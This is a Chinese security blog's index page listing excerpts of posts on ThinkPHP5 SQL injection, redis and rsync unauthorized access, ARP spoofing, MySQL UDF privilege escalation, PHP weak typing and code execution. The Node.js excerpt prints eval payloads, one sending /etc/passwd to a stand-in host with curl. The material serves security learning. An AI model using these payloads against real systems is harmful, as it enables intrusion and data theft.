HacKerQWQ的博客空间

HacKerQWQ的博客空间

You do things when the opportunities come along.

TP5SQL注入漏洞分析TP5全版本
配置通过以下命令获取测试环境代码: 1composer create-project --prefer-dist topthink/think=5.0.10 tpdemo 将 composer.json 文件的 require 字段设置成如下: 1234"require": { "php": ">=5.4.0", "topthink/framework": "5.0.10"}, 然后执行 composer update ,并将 applicatio...
TP5SQL注入漏洞分析(5.1.6-5.1.7)
参考学习连接 https://github.com/Mochazz/ThinkPHP-Vuln/blob/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A52.md漏洞简介thinkphp/library/think/db/builder/Mysql.php中的parseArrayData没有对传入的数据进行过滤,导致可拼接sql语句,造成sql注入 配置1234567891011121314151617181920212223242526272829...
TP5SQL注入漏洞分析(5.0.13-5.0.15,5.1.0-5.1.5)
参考学习链接 https://github.com/Mochazz/ThinkPHP-Vuln/blob/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A51.md简介thinkphp/library/think/db/Builder.php中的parseData对传入的字符没有进行检测,拼接到了sql语句中,导致了sql注入 配置环境 下载源码 12345678910#composer 选择特定分支composer create-project --...
未授权访问漏洞归纳
redis未授权访问link:https://hackerqwq.github.io/2021/04/19/redis%E6%94%BB%E9%98%B2%E5%88%A9%E7%94%A8%E9%9D%A2%E6%80%BB%E7%BB%93/ 通过RESP工具连接 rsync未授权访问漏洞简介rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 默认无账号密码,可直接访问 漏洞利用 nmap扫描端口发现rsync端...
arp欺骗与攻击
arp欺骗原理每个主机都有IP和MAC地址对应的关系的缓存表,由于在局域网内主机的数据传输依靠的是MAC地址进行数据传输,并且不会验证是否向对方发送过ARP请求包,因此可以通过替换目标主机的缓存表来达到arp欺骗的目的 实现arp欺骗 使用工具:arpspoof(包含在dsniff工具中) 平台:kali 步骤查看自己ip1ifconfig -a 查看局域网内ip此处有多个命令,推荐三个常用的 123arp-scan -lfping -g C段(扫描存活主机,但是没有mac地址)netdiscover -r 网段/24 这是fping -g的截图 ARP欺骗 开启IP转发1echo ...
udf提权学习
UDF定义UDF (user defined function)**,即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,可以通过导入dll文件增加新的函数**,执行系统命令 UDF提权步骤查看secure_file_priv的值1234show global variables like 'secure%'; 当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权 当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/...
弱类型比较小笔记
松散比较当比较类型不同时自动转换类型 1234<?phpvar_dump(null ==false); //bool(true)var_dump('aa'==0); //bool(true)?> Hash函数绕过https://hackerqwq.github.io/2020/06/10/MD5-collision/ 弱类型函数is_numeric()is_numeric() 检测变量是否为数字或数字字符串。如果 是数字和数字字符串则返回 TRUE,否则返回 FALSE。 它的弱类型问题是他支持十六进制0x格式,攻击者把payload改成十六进制0x,i...
代码执行小总结
代码执行漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞。常见代码注射函数:如:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function等函数漏洞危害:执行代码,写入webshell、控制服务器 示例代码: 12345678910111213141516171819202122<?php/*# -*- coding: utf-8 -*-# @Author: 羽# @Date: 2020-09-05 20:31:22# @Last Modif...
nodejs利用小总结
参考链接:Node.js 常见漏洞学习与总结 eval导致的命令执行常见payload弹计算器(windows): 1/eval?q=require('child_process').exec('calc'); 读取文件(linux): 12/eval?q=require('child_process').exec('curl -F "x=`cat /etc/passwd`" http://vps');;curl -F参数用于传输二进制文件 反弹shell(linux): 12345/ev...
avatar
HacKerQWQ
striving
FRIENDS
friendA friendB